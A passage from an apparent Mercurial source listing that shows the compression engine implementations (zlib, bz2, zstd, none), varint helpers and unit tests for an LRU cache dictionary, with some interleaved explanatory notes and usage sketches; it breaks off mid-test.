3432 3442 the data could not be compressed (too small, not compressible, etc).
3433 3443 The returned data should have a header uniquely identifying this
3434 3444 compression format so decompression can be routed to this engine.
3435 3445 This header should be identified by the ``revlogheader()`` return
3436 3446 value.
3437 3447
3438 3448 The object has a ``decompress(data)`` method that decompresses
3439 3449 data. The method will only be called if ``data`` begins with
3440 3450 ``revlogheader()``. The method should return the raw, uncompressed
3441 3451 data or raise a ``RevlogError``.
3442 3452
3443 3453 The object is reusable but is not thread safe.
3444 3454 """
3445 3455 raise NotImplementedError()
3446 3456
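To make the contract concrete, here is a minimal sketch of a hypothetical engine. The name ``_identityengine`` is illustrative and not part of Mercurial; the real pass-through engine, ``_noopengine``, appears later in this file:

    class _identityengine(compressionengine):
        def name(self):
            return 'identity'

        def bundletype(self):
            """Hypothetical pass-through compression."""
            # (user-facing spec name, internal bundle identifier)
            return 'identity', 'ID'

        def compressstream(self, it, opts=None):
            return it  # chunks pass through unmodified

        def decompressorreader(self, fh):
            return fh  # reading back is the identity as well

    # Registration would then be: compengines.register(_identityengine())
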
3447 3457 class _CompressedStreamReader(object):
3448 3458 def __init__(self, fh):
3449 3459 if safehasattr(fh, 'unbufferedread'):
3450 3460 self._reader = fh.unbufferedread
3451 3461 else:
3452 3462 self._reader = fh.read
3453 3463 self._pending = []
3454 3464 self._pos = 0
3455 3465 self._eof = False
3456 3466
3457 3467 def _decompress(self, chunk):
3458 3468 raise NotImplementedError()
3459 3469
3460 3470 def read(self, l):
3461 3471 buf = []
3462 3472 while True:
3463 3473 while self._pending:
3464 3474 if len(self._pending[0]) > l + self._pos:
3465 3475 newbuf = self._pending[0]
3466 3476 buf.append(newbuf[self._pos:self._pos + l])
3467 3477 self._pos += l
3468 3478 return ''.join(buf)
3469 3479
3470 3480 newbuf = self._pending.pop(0)
3471 3481 if self._pos:
3472 3482 buf.append(newbuf[self._pos:])
3473 3483 l -= len(newbuf) - self._pos
3474 3484 else:
3475 3485 buf.append(newbuf)
3476 3486 l -= len(newbuf)
3477 3487 self._pos = 0
3478 3488
3479 3489 if self._eof:
3480 3490 return ''.join(buf)
3481 3491 chunk = self._reader(65536)
3482 3492 self._decompress(chunk)
3483 3493 if not chunk and not self._pending and not self._eof:
3484 3494 # No progress and no new data, bail out
3485 3495 return ''.join(buf)
3486 3496
3487 3497 class _GzipCompressedStreamReader(_CompressedStreamReader):
3488 3498 def __init__(self, fh):
3489 3499 super(_GzipCompressedStreamReader, self).__init__(fh)
3490 3500 self._decompobj = zlib.decompressobj()
3491 3501 def _decompress(self, chunk):
3492 3502 newbuf = self._decompobj.decompress(chunk)
3493 3503 if newbuf:
3494 3504 self._pending.append(newbuf)
3495 3505 d = self._decompobj.copy()
3496 3506 try:
3497 3507 d.decompress('x')
3498 3508 d.flush()
3499 3509 if d.unused_data == 'x':
3500 3510 self._eof = True
3501 3511 except zlib.error:
3502 3512 pass
3503 3513
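A quick round-trip sketch of the reader above (assuming the Python 2 bytes-as-str semantics this module is written against; ``io.BytesIO`` stands in for a socket or bundle file handle):

    import io
    import zlib

    payload = b'hello world' * 1000
    reader = _GzipCompressedStreamReader(io.BytesIO(zlib.compress(payload)))
    # Arbitrary read sizes are fine; buffering of decompressed chunks is
    # handled by _CompressedStreamReader.read().
    assert reader.read(11) == b'hello world'
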
3504 3514 class _BZ2CompressedStreamReader(_CompressedStreamReader):
3505 3515 def __init__(self, fh):
3506 3516 super(_BZ2CompressedStreamReader, self).__init__(fh)
3507 3517 self._decompobj = bz2.BZ2Decompressor()
3508 3518 def _decompress(self, chunk):
3509 3519 newbuf = self._decompobj.decompress(chunk)
3510 3520 if newbuf:
3511 3521 self._pending.append(newbuf)
3512 3522 try:
3513 3523 while True:
3514 3524 newbuf = self._decompobj.decompress('')
3515 3525 if newbuf:
3516 3526 self._pending.append(newbuf)
3517 3527 else:
3518 3528 break
3519 3529 except EOFError:
3520 3530 self._eof = True
3521 3531
3522 3532 class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
3523 3533 def __init__(self, fh):
3524 3534 super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
3525 3535 newbuf = self._decompobj.decompress('BZ')
3526 3536 if newbuf:
3527 3537 self._pending.append(newbuf)
3528 3538
3529 3539 class _ZstdCompressedStreamReader(_CompressedStreamReader):
3530 3540 def __init__(self, fh, zstd):
3531 3541 super(_ZstdCompressedStreamReader, self).__init__(fh)
3532 3542 self._zstd = zstd
3533 3543 self._decompobj = zstd.ZstdDecompressor().decompressobj()
3534 3544 def _decompress(self, chunk):
3535 3545 newbuf = self._decompobj.decompress(chunk)
3536 3546 if newbuf:
3537 3547 self._pending.append(newbuf)
3538 3548 try:
3539 3549 while True:
3540 3550 newbuf = self._decompobj.decompress('')
3541 3551 if newbuf:
3542 3552 self._pending.append(newbuf)
3543 3553 else:
3544 3554 break
3545 3555 except self._zstd.ZstdError:
3546 3556 self._eof = True
3547 3557
3548 3558 class _zlibengine(compressionengine):
3549 3559 def name(self):
3550 3560 return 'zlib'
3551 3561
3552 3562 def bundletype(self):
3553 3563 """zlib compression using the DEFLATE algorithm.
3554 3564
3555 3565 All Mercurial clients should support this format. The compression
3556 3566 algorithm strikes a reasonable balance between compression ratio
3557 3567 and size.
3558 3568 """
3559 3569 return 'gzip', 'GZ'
3560 3570
3561 3571 def wireprotosupport(self):
3562 3572 return compewireprotosupport('zlib', 20, 20)
3563 3573
3564 3574 def revlogheader(self):
3565 3575 return 'x'
3566 3576
3567 3577 def compressstream(self, it, opts=None):
3568 3578 opts = opts or {}
3569 3579
3570 3580 z = zlib.compressobj(opts.get('level', -1))
3571 3581 for chunk in it:
3572 3582 data = z.compress(chunk)
3573 3583 # Not all calls to compress emit data. It is cheaper to inspect
3574 3584 # here than to feed empty chunks through generator.
3575 3585             # here than to feed empty chunks through the generator.
3576 3586 yield data
3577 3587
3578 3588 yield z.flush()
3579 3589
3580 3590 def decompressorreader(self, fh):
3581 3591 return _GzipCompressedStreamReader(fh)
3582 3592
3583 3593 class zlibrevlogcompressor(object):
3584 3594 def compress(self, data):
3585 3595 insize = len(data)
3586 3596 # Caller handles empty input case.
3587 3597 assert insize > 0
3588 3598
3589 3599 if insize < 44:
3590 3600 return None
3591 3601
3592 3602 elif insize <= 1000000:
3593 3603 compressed = zlib.compress(data)
3594 3604 if len(compressed) < insize:
3595 3605 return compressed
3596 3606 return None
3597 3607
3598 3608 # zlib makes an internal copy of the input buffer, doubling
3599 3609 # memory usage for large inputs. So do streaming compression
3600 3610 # on large inputs.
3601 3611 else:
3602 3612 z = zlib.compressobj()
3603 3613 parts = []
3604 3614 pos = 0
3605 3615 while pos < insize:
3606 3616 pos2 = pos + 2**20
3607 3617 parts.append(z.compress(data[pos:pos2]))
3608 3618 pos = pos2
3609 3619 parts.append(z.flush())
3610 3620
3611 3621 if sum(map(len, parts)) < insize:
3612 3622 return ''.join(parts)
3613 3623 return None
3614 3624
3615 3625 def decompress(self, data):
3616 3626 try:
3617 3627 return zlib.decompress(data)
3618 3628 except zlib.error as e:
3619 3629 raise error.RevlogError(_('revlog decompress error: %s') %
3620 3630 stringutil.forcebytestr(e))
3621 3631
3622 3632 def revlogcompressor(self, opts=None):
3623 3633 return self.zlibrevlogcompressor()
3624 3634
3625 3635 compengines.register(_zlibengine())
3626 3636
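A hedged usage sketch of the engine just registered; the stream API is chunk-oriented on both the compression and decompression sides:

    eng = compengines['zlib']
    chunks = list(eng.compressstream(iter([b'hello ', b'world'])))
    # b''.join(chunks) is now a complete zlib stream; wrapping it in a
    # file-like object and passing that to eng.decompressorreader()
    # recovers the original input incrementally.
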
3627 3637 class _bz2engine(compressionengine):
3628 3638 def name(self):
3629 3639 return 'bz2'
3630 3640
3631 3641 def bundletype(self):
3632 3642 """An algorithm that produces smaller bundles than ``gzip``.
3633 3643
3634 3644 All Mercurial clients should support this format.
3635 3645
3636 3646 This engine will likely produce smaller bundles than ``gzip`` but
3637 3647 will be significantly slower, both during compression and
3638 3648 decompression.
3639 3649
3640 3650 If available, the ``zstd`` engine can yield similar or better
3641 3651 compression at much higher speeds.
3642 3652 """
3643 3653 return 'bzip2', 'BZ'
3644 3654
3645 3655 # We declare a protocol name but don't advertise by default because
3646 3656 # it is slow.
3647 3657 def wireprotosupport(self):
3648 3658 return compewireprotosupport('bzip2', 0, 0)
3649 3659
3650 3660 def compressstream(self, it, opts=None):
3651 3661 opts = opts or {}
3652 3662 z = bz2.BZ2Compressor(opts.get('level', 9))
3653 3663 for chunk in it:
3654 3664 data = z.compress(chunk)
3655 3665 if data:
3656 3666 yield data
3657 3667
3658 3668 yield z.flush()
3659 3669
3660 3670 def decompressorreader(self, fh):
3661 3671 return _BZ2CompressedStreamReader(fh)
3662 3672
3663 3673 compengines.register(_bz2engine())
3664 3674
3665 3675 class _truncatedbz2engine(compressionengine):
3666 3676 def name(self):
3667 3677 return 'bz2truncated'
3668 3678
3669 3679 def bundletype(self):
3670 3680 return None, '_truncatedBZ'
3671 3681
3672 3682 # We don't implement compressstream because it is hackily handled elsewhere.
3673 3683
3674 3684 def decompressorreader(self, fh):
3675 3685 return _TruncatedBZ2CompressedStreamReader(fh)
3676 3686
3677 3687 compengines.register(_truncatedbz2engine())
3678 3688
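Judging from the priming in ``_TruncatedBZ2CompressedStreamReader.__init__`` above and the internal-only ``_truncatedBZ`` identifier, this engine presumably serves legacy bundles whose 'BZ' magic doubles as part of the bundle header (e.g. ``HG10BZ``-style headers), so the stream that reaches the decompressor no longer carries those two bytes and they must be re-fed first.
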
3679 3689 class _noopengine(compressionengine):
3680 3690 def name(self):
3681 3691 return 'none'
3682 3692
3683 3693 def bundletype(self):
3684 3694 """No compression is performed.
3685 3695
3686 3696 Use this compression engine to explicitly disable compression.
3687 3697 """
3688 3698 return 'none', 'UN'
3689 3699
3690 3700     # Clients always support uncompressed payloads. Servers don't by
3691 3701     # default because, unless the network is fast, uncompressed payloads
3692 3702     # can easily saturate the pipe.
3693 3703 def wireprotosupport(self):
3694 3704 return compewireprotosupport('none', 0, 10)
3695 3705
3696 3706 # We don't implement revlogheader because it is handled specially
3697 3707 # in the revlog class.
3698 3708
3699 3709 def compressstream(self, it, opts=None):
3700 3710 return it
3701 3711
3702 3712 def decompressorreader(self, fh):
3703 3713 return fh
3704 3714
3705 3715 class nooprevlogcompressor(object):
3706 3716 def compress(self, data):
3707 3717 return None
3708 3718
3709 3719 def revlogcompressor(self, opts=None):
3710 3720 return self.nooprevlogcompressor()
3711 3721
3712 3722 compengines.register(_noopengine())
3713 3723
3714 3724 class _zstdengine(compressionengine):
3715 3725 def name(self):
3716 3726 return 'zstd'
3717 3727
3718 3728 @propertycache
3719 3729 def _module(self):
3720 3730 # Not all installs have the zstd module available. So defer importing
3721 3731 # until first access.
3722 3732 try:
3723 3733 from . import zstd
3724 3734 # Force delayed import.
3725 3735 zstd.__version__
3726 3736 return zstd
3727 3737 except ImportError:
3728 3738 return None
3729 3739
3730 3740 def available(self):
3731 3741 return bool(self._module)
3732 3742
3733 3743 def bundletype(self):
3734 3744 """A modern compression algorithm that is fast and highly flexible.
3735 3745
3736 3746 Only supported by Mercurial 4.1 and newer clients.
3737 3747
3738 3748 With the default settings, zstd compression is both faster and yields
3739 3749 better compression than ``gzip``. It also frequently yields better
3740 3750 compression than ``bzip2`` while operating at much higher speeds.
3741 3751
3742 3752 If this engine is available and backwards compatibility is not a
3743 3753 concern, it is likely the best available engine.
3744 3754 """
3745 3755 return 'zstd', 'ZS'
3746 3756
3747 3757 def wireprotosupport(self):
3748 3758 return compewireprotosupport('zstd', 50, 50)
3749 3759
3750 3760 def revlogheader(self):
3751 3761 return '\x28'
3752 3762
3753 3763 def compressstream(self, it, opts=None):
3754 3764 opts = opts or {}
3755 3765 # zstd level 3 is almost always significantly faster than zlib
3756 3766 # while providing no worse compression. It strikes a good balance
3757 3767 # between speed and compression.
3758 3768 level = opts.get('level', 3)
3759 3769
3760 3770 zstd = self._module
3761 3771 z = zstd.ZstdCompressor(level=level).compressobj()
3762 3772 for chunk in it:
3763 3773 data = z.compress(chunk)
3764 3774 if data:
3765 3775 yield data
3766 3776
3767 3777 yield z.flush()
3768 3778
3769 3779 def decompressorreader(self, fh):
3770 3780 return _ZstdCompressedStreamReader(fh, self._module)
3771 3781
3772 3782 class zstdrevlogcompressor(object):
3773 3783 def __init__(self, zstd, level=3):
3774 3784 # TODO consider omitting frame magic to save 4 bytes.
3775 3785 # This writes content sizes into the frame header. That is
3776 3786 # extra storage. But it allows a correct size memory allocation
3777 3787 # to hold the result.
3778 3788 self._cctx = zstd.ZstdCompressor(level=level)
3779 3789 self._dctx = zstd.ZstdDecompressor()
3780 3790 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3781 3791 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3782 3792
3783 3793 def compress(self, data):
3784 3794 insize = len(data)
3785 3795 # Caller handles empty input case.
3786 3796 assert insize > 0
3787 3797
3788 3798 if insize < 50:
3789 3799 return None
3790 3800
3791 3801 elif insize <= 1000000:
3792 3802 compressed = self._cctx.compress(data)
3793 3803 if len(compressed) < insize:
3794 3804 return compressed
3795 3805 return None
3796 3806 else:
3797 3807 z = self._cctx.compressobj()
3798 3808 chunks = []
3799 3809 pos = 0
3800 3810 while pos < insize:
3801 3811 pos2 = pos + self._compinsize
3802 3812 chunk = z.compress(data[pos:pos2])
3803 3813 if chunk:
3804 3814 chunks.append(chunk)
3805 3815 pos = pos2
3806 3816 chunks.append(z.flush())
3807 3817
3808 3818 if sum(map(len, chunks)) < insize:
3809 3819 return ''.join(chunks)
3810 3820 return None
3811 3821
3812 3822 def decompress(self, data):
3813 3823 insize = len(data)
3814 3824
3815 3825 try:
3816 3826 # This was measured to be faster than other streaming
3817 3827 # decompressors.
3818 3828 dobj = self._dctx.decompressobj()
3819 3829 chunks = []
3820 3830 pos = 0
3821 3831 while pos < insize:
3822 3832 pos2 = pos + self._decompinsize
3823 3833 chunk = dobj.decompress(data[pos:pos2])
3824 3834 if chunk:
3825 3835 chunks.append(chunk)
3826 3836 pos = pos2
3827 3837 # Frame should be exhausted, so no finish() API.
3828 3838
3829 3839 return ''.join(chunks)
3830 3840 except Exception as e:
3831 3841 raise error.RevlogError(_('revlog decompress error: %s') %
3832 3842 stringutil.forcebytestr(e))
3833 3843
3834 3844 def revlogcompressor(self, opts=None):
3835 3845 opts = opts or {}
3836 3846 return self.zstdrevlogcompressor(self._module,
3837 3847 level=opts.get('level', 3))
3838 3848
3839 3849 compengines.register(_zstdengine())
3840 3850
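When the bundled ``zstd`` module is importable, the revlog compressor can be exercised as below (a sketch; ``available()`` must be checked because the module is optional):

    eng = compengines['zstd']
    if eng.available():
        c = eng.revlogcompressor()
        data = b'a highly repetitive revlog chunk ' * 100
        blob = c.compress(data)
        # compress() returns None when storing uncompressed is cheaper;
        # otherwise decompress() round-trips the original bytes.
        assert blob is None or c.decompress(blob) == data
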
3841 3851 def bundlecompressiontopics():
3842 3852 """Obtains a list of available bundle compressions for use in help."""
3843 3853 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3844 3854 items = {}
3845 3855
3846 3856 # We need to format the docstring. So use a dummy object/type to hold it
3847 3857 # rather than mutating the original.
3848 3858 class docobject(object):
3849 3859 pass
3850 3860
3851 3861 for name in compengines:
3852 3862 engine = compengines[name]
3853 3863
3854 3864 if not engine.available():
3855 3865 continue
3856 3866
3857 3867 bt = engine.bundletype()
3858 3868 if not bt or not bt[0]:
3859 3869 continue
3860 3870
3861 3871 doc = pycompat.sysstr('``%s``\n %s') % (
3862 3872 bt[0], engine.bundletype.__doc__)
3863 3873
3864 3874 value = docobject()
3865 3875 value.__doc__ = doc
3866 3876 value._origdoc = engine.bundletype.__doc__
3867 3877 value._origfunc = engine.bundletype
3868 3878
3869 3879 items[bt[0]] = value
3870 3880
3871 3881 return items
3872 3882
3873 3883 i18nfunctions = bundlecompressiontopics().values()
3874 3884
3875 3885 # convenient shortcut
3876 3886 dst = debugstacktrace
3877 3887
3878 3888 def safename(f, tag, ctx, others=None):
3879 3889 """
3880 3890     Generate a name that is safe to rename f to in the given context.
3881 3891
3882 3892 f: filename to rename
3883 3893 tag: a string tag that will be included in the new name
3884 3894 ctx: a context, in which the new name must not exist
3885 3895 others: a set of other filenames that the new name must not be in
3886 3896
3887 3897 Returns a file name of the form oldname~tag[~number] which does not exist
3888 3898 in the provided context and is not in the set of other names.
3889 3899 """
3890 3900 if others is None:
3891 3901 others = set()
3892 3902
3893 3903 fn = '%s~%s' % (f, tag)
3894 3904 if fn not in ctx and fn not in others:
3895 3905 return fn
3896 3906 for n in itertools.count(1):
3897 3907 fn = '%s~%s~%s' % (f, tag, n)
3898 3908 if fn not in ctx and fn not in others:
3899 3909 return fn
3900 3910
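Because ``ctx`` and ``others`` only need to support membership tests, plain sets are enough to illustrate the collision handling (all names here are hypothetical):

    taken = {'foo~base'}       # stand-in for names already in the context
    reserved = {'foo~base~1'}  # other names the caller wants to avoid
    assert safename('foo', 'base', taken, others=reserved) == 'foo~base~2'
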
3901 3911 def readexactly(stream, n):
3902 3912     '''read n bytes from stream.read and abort if fewer were available'''
3903 3913 s = stream.read(n)
3904 3914 if len(s) < n:
3905 3915 raise error.Abort(_("stream ended unexpectedly"
3906 3916 " (got %d bytes, expected %d)")
3907 3917 % (len(s), n))
3908 3918 return s
3909 3919
3910 3920 def uvarintencode(value):
3911 3921 """Encode an unsigned integer value to a varint.
3912 3922
3913 3923 A varint is a variable length integer of 1 or more bytes. Each byte
3914 3924 except the last has the most significant bit set. The lower 7 bits of
3915 3925 each byte store the 2's complement representation, least significant group
3916 3926     each byte store the value's binary representation, least significant group
3917 3927
3918 3928 >>> uvarintencode(0)
3919 3929 '\\x00'
3920 3930 >>> uvarintencode(1)
3921 3931 '\\x01'
3922 3932 >>> uvarintencode(127)
3923 3933 '\\x7f'
3924 3934 >>> uvarintencode(1337)
3925 3935 '\\xb9\\n'
3926 3936 >>> uvarintencode(65536)
3927 3937 '\\x80\\x80\\x04'
3928 3938 >>> uvarintencode(-1)
3929 3939 Traceback (most recent call last):
3930 3940 ...
3931 3941 ProgrammingError: negative value for uvarint: -1
3932 3942 """
3933 3943 if value < 0:
3934 3944 raise error.ProgrammingError('negative value for uvarint: %d'
3935 3945 % value)
3936 3946 bits = value & 0x7f
3937 3947 value >>= 7
3938 3948 bytes = []
3939 3949 while value:
3940 3950 bytes.append(pycompat.bytechr(0x80 | bits))
3941 3951 bits = value & 0x7f
3942 3952 value >>= 7
3943 3953 bytes.append(pycompat.bytechr(bits))
3944 3954
3945 3955 return ''.join(bytes)
3946 3956
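Tracing the encoder on 1337 makes the layout concrete: 1337 is 0b10100111001, the low seven bits are 0111001 (0x39) and the remainder is 1010 (0x0a), so the first byte is 0x80 | 0x39 = 0xb9 (continuation bit set) and the second is 0x0a, matching the '\xb9\n' doctest above. Two spot checks:

    assert uvarintencode(1337) == b'\xb9\n'  # continuation bit on first byte
    assert uvarintencode(127) == b'\x7f'     # fits in one byte, no continuation
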
3947 3957 def uvarintdecodestream(fh):
3948 3958 """Decode an unsigned variable length integer from a stream.
3949 3959
3950 3960 The passed argument is anything that has a ``.read(N)`` method.
3951 3961
3952 3962 >>> try:
3953 3963 ... from StringIO import StringIO as BytesIO
3954 3964 ... except ImportError:
3955 3965 ... from io import BytesIO
3956 3966 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3957 3967 0
3958 3968 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3959 3969 1
3960 3970 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3961 3971 127
3962 3972 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3963 3973 1337
3964 3974 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3965 3975 65536
3966 3976 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3967 3977 Traceback (most recent call last):
3968 3978 ...
3969 3979 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3970 3980 """
3971 3981 result = 0
3972 3982 shift = 0
3973 3983 while True:
3974 3984 byte = ord(readexactly(fh, 1))
3975 3985 result |= ((byte & 0x7f) << shift)
3976 3986 if not (byte & 0x80):
3977 3987 return result
3978 3988 shift += 7
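The encoder and decoder above are inverses, which a quick round trip confirms (same bytes-as-str assumptions as the rest of this module):

    import io
    for value in (0, 1, 127, 128, 1337, 65536):
        assert uvarintdecodestream(io.BytesIO(uvarintencode(value))) == value
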
@@ -1,325 +1,325 b''
1 1 from __future__ import absolute_import, print_function
2 2
3 3 import unittest
4 4
5 5 import silenttestrunner
6 6
7 7 from mercurial import (
8 8 util,
9 9 )
10 10
11 11 class testlrucachedict(unittest.TestCase):
12 12 def testsimple(self):
13 13 d = util.lrucachedict(4)
14 14 self.assertEqual(d.capacity, 4)
15 15 d.insert('a', 'va', cost=2)
16 16 d['b'] = 'vb'
17 17 d['c'] = 'vc'
18 18 d.insert('d', 'vd', cost=42)
19 19
20 20 self.assertEqual(d['a'], 'va')
21 21 self.assertEqual(d['b'], 'vb')
22 22 self.assertEqual(d['c'], 'vc')
23 23 self.assertEqual(d['d'], 'vd')
24 24
25 25 self.assertEqual(d.totalcost, 44)
26 26
27 27 # 'a' should be dropped because it was least recently used.
28 28 d['e'] = 've'
29 29 self.assertNotIn('a', d)
30 30 self.assertIsNone(d.get('a'))
31 31 self.assertEqual(d.totalcost, 42)
32 32
33 33 self.assertEqual(d['b'], 'vb')
34 34 self.assertEqual(d['c'], 'vc')
35 35 self.assertEqual(d['d'], 'vd')
36 36 self.assertEqual(d['e'], 've')
37 37
38 38 # Replacing item with different cost adjusts totalcost.
39 39 d.insert('e', 've', cost=4)
40 40 self.assertEqual(d.totalcost, 46)
41 41
42 42 # Touch entries in some order (both get and set).
43 43 d['e']
44 44 d['c'] = 'vc2'
45 45 d['d']
46 46 d['b'] = 'vb2'
47 47
48 48 # 'e' should be dropped now
49 49 d['f'] = 'vf'
50 50 self.assertNotIn('e', d)
51 51 self.assertEqual(d['b'], 'vb2')
52 52 self.assertEqual(d['c'], 'vc2')
53 53 self.assertEqual(d['d'], 'vd')
54 54 self.assertEqual(d['f'], 'vf')
55 55
56 56 d.clear()
57 57 for key in ('a', 'b', 'c', 'd', 'e', 'f'):
58 58 self.assertNotIn(key, d)
59 59
60 60 def testunfull(self):
61 61 d = util.lrucachedict(4)
62 62 d['a'] = 1
63 63 d['b'] = 2
64 64 d['a']
65 65 d['b']
66 66
67 67 for key in ('a', 'b'):
68 68 self.assertIn(key, d)
69 69
70 70 def testcopypartial(self):
71 71 d = util.lrucachedict(4)
72 72 d.insert('a', 'va', cost=4)
73 73 d.insert('b', 'vb', cost=2)
74 74
75 75 dc = d.copy()
76 76
77 77 self.assertEqual(len(dc), 2)
78 78 self.assertEqual(dc.totalcost, 6)
79 79 for key in ('a', 'b'):
80 80 self.assertIn(key, dc)
81 81 self.assertEqual(dc[key], 'v%s' % key)
82 82
83 83 self.assertEqual(len(d), 2)
84 84 for key in ('a', 'b'):
85 85 self.assertIn(key, d)
86 86 self.assertEqual(d[key], 'v%s' % key)
87 87
88 88 d['c'] = 'vc'
89 89 del d['b']
90 90 self.assertEqual(d.totalcost, 4)
91 91 dc = d.copy()
92 92 self.assertEqual(len(dc), 2)
93 93 self.assertEqual(dc.totalcost, 4)
94 94 for key in ('a', 'c'):
95 95 self.assertIn(key, dc)
96 96 self.assertEqual(dc[key], 'v%s' % key)
97 97
98 98 def testcopyempty(self):
99 99 d = util.lrucachedict(4)
100 100 dc = d.copy()
101 101 self.assertEqual(len(dc), 0)
102 102
103 103 def testcopyfull(self):
104 104 d = util.lrucachedict(4)
105 105 d.insert('a', 'va', cost=42)
106 106 d['b'] = 'vb'
107 107 d['c'] = 'vc'
108 108 d['d'] = 'vd'
109 109
110 110 dc = d.copy()
111 111
112 112 for key in ('a', 'b', 'c', 'd'):
113 113 self.assertIn(key, dc)
114 114 self.assertEqual(dc[key], 'v%s' % key)
115 115
116 116 self.assertEqual(d.totalcost, 42)
117 117 self.assertEqual(dc.totalcost, 42)
118 118
119 119 # 'a' should be dropped because it was least recently used.
120 120 dc['e'] = 've'
121 121 self.assertNotIn('a', dc)
122 122 for key in ('b', 'c', 'd', 'e'):
123 123 self.assertIn(key, dc)
124 124 self.assertEqual(dc[key], 'v%s' % key)
125 125
126 126 self.assertEqual(d.totalcost, 42)
127 127 self.assertEqual(dc.totalcost, 0)
128 128
129 129 # Contents and order of original dict should remain unchanged.
130 130 dc['b'] = 'vb_new'
131 131
132 132 self.assertEqual(list(iter(d)), ['d', 'c', 'b', 'a'])
133 133 for key in ('a', 'b', 'c', 'd'):
134 134 self.assertEqual(d[key], 'v%s' % key)
135 135
136 136 d = util.lrucachedict(4, maxcost=42)
137 137 d.insert('a', 'va', cost=5)
138 138 d.insert('b', 'vb', cost=4)
139 139 d.insert('c', 'vc', cost=3)
140 140 dc = d.copy()
141 141 self.assertEqual(dc.maxcost, 42)
142 142 self.assertEqual(len(dc), 3)
143 143
144 144 # Max cost can be lowered as part of copy.
145 145 dc = d.copy(maxcost=10)
146 146 self.assertEqual(dc.maxcost, 10)
147 147 self.assertEqual(len(dc), 2)
148 148 self.assertEqual(dc.totalcost, 7)
149 149 self.assertIn('b', dc)
150 150 self.assertIn('c', dc)
151 151
152 152 def testcopydecreasecapacity(self):
153 153 d = util.lrucachedict(5)
154 154 d.insert('a', 'va', cost=4)
155 155 d.insert('b', 'vb', cost=2)
156 156 d['c'] = 'vc'
157 157 d['d'] = 'vd'
158 158
159 159 dc = d.copy(2)
160 160 self.assertEqual(dc.totalcost, 0)
161 161 for key in ('a', 'b'):
162 162 self.assertNotIn(key, dc)
163 163 for key in ('c', 'd'):
164 164 self.assertIn(key, dc)
165 165 self.assertEqual(dc[key], 'v%s' % key)
166 166
167 167 dc.insert('e', 've', cost=7)
168 168 self.assertEqual(dc.totalcost, 7)
169 169 self.assertNotIn('c', dc)
170 170 for key in ('d', 'e'):
171 171 self.assertIn(key, dc)
172 172 self.assertEqual(dc[key], 'v%s' % key)
173 173
174 174 # Original should remain unchanged.
175 175 self.assertEqual(d.totalcost, 6)
176 176 for key in ('a', 'b', 'c', 'd'):
177 177 self.assertIn(key, d)
178 178 self.assertEqual(d[key], 'v%s' % key)
179 179
180 180 def testcopyincreasecapacity(self):
181 181 d = util.lrucachedict(5)
182 182 d['a'] = 'va'
183 183 d['b'] = 'vb'
184 184 d['c'] = 'vc'
185 185 d['d'] = 'vd'
186 186
187 187 dc = d.copy(6)
188 188 for key in ('a', 'b', 'c', 'd'):
189 189 self.assertIn(key, dc)
190 190 self.assertEqual(dc[key], 'v%s' % key)
191 191
192 192 dc['e'] = 've'
193 193 dc['f'] = 'vf'
194 194 for key in ('a', 'b', 'c', 'd', 'e', 'f'):
195 195 self.assertIn(key, dc)
196 196 self.assertEqual(dc[key], 'v%s' % key)
197 197
198 198 dc['g'] = 'vg'
199 199 self.assertNotIn('a', dc)
200 200 for key in ('b', 'c', 'd', 'e', 'f', 'g'):
201 201 self.assertIn(key, dc)
202 202 self.assertEqual(dc[key], 'v%s' % key)
203 203
204 204 # Original should remain unchanged.
205 205 for key in ('a', 'b', 'c', 'd'):
206 206 self.assertIn(key, d)
207 207 self.assertEqual(d[key], 'v%s' % key)
208 208
209 209 def testpopoldest(self):
210 210 d = util.lrucachedict(4)
211 211 d.insert('a', 'va', cost=10)
212 212 d.insert('b', 'vb', cost=5)
213 213
214 214 self.assertEqual(len(d), 2)
215 215 self.assertEqual(d.popoldest(), ('a', 'va'))
216 216 self.assertEqual(len(d), 1)
217 217 self.assertEqual(d.totalcost, 5)
218 218 self.assertEqual(d.popoldest(), ('b', 'vb'))
219 219 self.assertEqual(len(d), 0)
220 220 self.assertEqual(d.totalcost, 0)
221 221 self.assertIsNone(d.popoldest())
222 222
223 223 d['a'] = 'va'
224 224 d['b'] = 'vb'
225 225 d['c'] = 'vc'
226 226 d['d'] = 'vd'
227 227
228 228 self.assertEqual(d.popoldest(), ('a', 'va'))
229 229 self.assertEqual(len(d), 3)
230 230 for key in ('b', 'c', 'd'):
231 231 self.assertEqual(d[key], 'v%s' % key)
232 232
233 233 d['a'] = 'va'
234 234 self.assertEqual(d.popoldest(), ('b', 'vb'))
235 235
236 236 def testmaxcost(self):
237 237 # Item cost is zero by default.
238 238 d = util.lrucachedict(6, maxcost=10)
239 239 d['a'] = 'va'
240 240 d['b'] = 'vb'
241 241 d['c'] = 'vc'
242 242 d['d'] = 'vd'
243 243 self.assertEqual(len(d), 4)
244 244 self.assertEqual(d.totalcost, 0)
245 245
246 246 d.clear()
247 247
248 248 # Insertion to exact cost threshold works without eviction.
249 249 d.insert('a', 'va', cost=6)
250 250 d.insert('b', 'vb', cost=4)
251 251
252 252 self.assertEqual(len(d), 2)
253 253 self.assertEqual(d['a'], 'va')
254 254 self.assertEqual(d['b'], 'vb')
255 255
256 256 # Inserting a new element with 0 cost works.
257 257 d['c'] = 'vc'
258 258 self.assertEqual(len(d), 3)
259 259
260 260         # Inserting a new element with a cost that puts us above the high
261 261         # water mark evicts the single oldest item.
262 262 d.insert('d', 'vd', cost=1)
263 263 self.assertEqual(len(d), 3)
264 264 self.assertEqual(d.totalcost, 5)
265 265 self.assertNotIn('a', d)
266 266 for key in ('b', 'c', 'd'):
267 267 self.assertEqual(d[key], 'v%s' % key)
268 268
269 269 # Inserting a new element with enough room for just itself
270 270 # evicts all items before.
271 271 d.insert('e', 've', cost=10)
272 272 self.assertEqual(len(d), 1)
273 273 self.assertEqual(d.totalcost, 10)
274 274 self.assertIn('e', d)
275 275
276 276 # Inserting a new element with cost greater than threshold
277 277 # still retains that item.
